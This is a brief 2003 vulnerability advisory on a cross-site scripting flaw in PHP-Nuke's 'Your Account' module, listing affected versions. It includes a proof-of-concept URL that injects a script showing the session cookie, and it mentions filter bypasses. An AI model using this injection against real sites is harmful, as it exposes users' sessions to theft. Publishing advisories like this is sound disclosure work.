PHPNuke Your Account XSS Vulnerability

14-5-2003

----------------------------------------------------- PHPNuke "Your Account" XSS Vulnerability ------------------------------------------------------ ------------------------------------------------------ Vulnerable; ------------------------------------------------------ Francisco Burzi PHP-Nuke 6.5 Final Release ------------------------------------------------------ Not tested but %90 vulnerable; ------------------------------------------------------ Francisco Burzi PHP-Nuke 5.6 Francisco Burzi PHP-Nuke 6.0 Francisco Burzi PHP-Nuke 6.5 RC3 Francisco Burzi PHP-Nuke 6.5 RC2 Francisco Burzi PHP-Nuke 6.5 RC1 Francisco Burzi PHP-Nuke 6.5 ------------------------------------------------------ About PHPNuke; ------------------------------------------------------ PHP Based Content Management System http://www.phpnuke.org ------------------------------------------------------ Solution; ------------------------------------------------------ Simple string check or user check should be OK ! ------------------------------------------------------ Exploit; ------------------------------------------------------ http://[victim]/modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script> *You may need to login first. **Some of servers/PHP Nuke Systems has a security check for "bla<script>" strings for Querystrings or POST variables (ie. www.phphnuke.org). But this systems are still vulnerable. You can skip these controls with some JS tricks.

Recent Blog Posts

See all of the blog posts